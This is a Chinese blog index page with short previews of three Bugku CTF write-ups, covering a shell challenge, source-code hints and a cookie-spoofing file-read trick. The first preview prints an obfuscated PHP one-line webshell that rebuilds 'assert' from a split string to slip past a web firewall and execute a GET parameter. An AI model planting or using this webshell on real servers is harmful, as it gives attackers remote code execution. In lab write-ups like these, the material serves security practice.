- 博客(3)
- 收藏
- 关注
原创 Bugku-CTF-shell-过狗一句话
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])点击题目:读取PHP下面的文件:print_r(scandir($dir)),还可以利用print_r(glob("*.*"))访问txt文件:http://114.67.246.176:16100/.
2021-08-08 16:43:46 458
原创 Bugku-never_give_up
点击链接,查看题目右键查看源码,发现存在1p.html文件,查看文件发现被跳转到论坛首页,查看1p.html的源码,发现如下:view-source:http://114.67.246.176:18086/1p.html将下面的代码,分别进行url和base64解码:得到提示<?php"if(!$_GET['id']){ header('Location: hello.php?id=1'); exit();}$id=$_GET['id'];.
2021-08-08 16:26:05 270
原创 Bugku cookies欺骗
Bugku cookies欺骗1.点开链接显示字符串2.filename=a2V5cy50eHQ= base64解码为keys.txt,将index.php通过base64编码,查看源码url为:http://114.67.246.176:19276/index.php?line=1&filename=aW5kZXgucGhw通过python脚本读取全部内容:import requestsfor i in range(30): url = "http://11...
2021-08-08 15:41:26 189
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人